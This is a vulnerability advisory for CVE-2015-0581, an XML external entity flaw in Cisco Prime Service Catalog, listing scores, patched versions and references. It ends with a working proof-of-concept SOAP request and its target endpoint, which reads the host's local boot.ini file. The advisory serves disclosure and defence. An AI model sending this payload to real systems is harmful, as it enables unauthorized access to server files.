Advisory ID
OSI-1501
Description:
The XML parser of Cisco Prime Service Catalog suffers from a vulnerability that could allow an authenticated remote attacker to either cause denial of service conditions (resources consumption) or retrieve sensitive data (local data access).
Researcher:
Alexis Dimitriadis (a.dimitriadis[a t]obrela[do t]com)
Vulnerability:
CVE-2015-0581: Cisco Prime Service Catalog XML External Entity Processing Vulnerability
CVSS Base Score: 7.0, CVSS Temporal Score: 5.8
Identification date:
09/06/2014
Solution – fix & patch:
Cisco has released Prime Service Catalog 10.1 as well as a patch for 9.4.1, 9.4.1R2, 10.0, and 10.0R2 to remediate this vulnerability.
References:
Mitre entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0581
Cisco advisory: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-psc-xmlee
PoC:
The following information represents a PoC aiming to access the ‘boot.ini’ local file of the host lying underneath; note that directories can also be listed.
Url:
/RequestCenter/services/ServiceManagerTaskService
Post data:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY varname SYSTEM "file:///C:/boot.ini">]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:req="http://smtask.api.newscale.com">
<soapenv:Header><req:AuthenticationToken>
<req:Username>username&varname;</req:Username><req:Password>password</req:Password>
</req:AuthenticationToken></soapenv:Header>
<soapenv:Body><req:getAuthorizationsForUser>
<req:userLoginName>username</req:userLoginName><req:startRow>0</req:startRow>
<req:numberOfRows>9999</req:numberOfRows><req:status>1</req:status>
<req:viewType>2</req:viewType>
</req:getAuthorizationsForUser></soapenv:Body></soapenv:Envelope>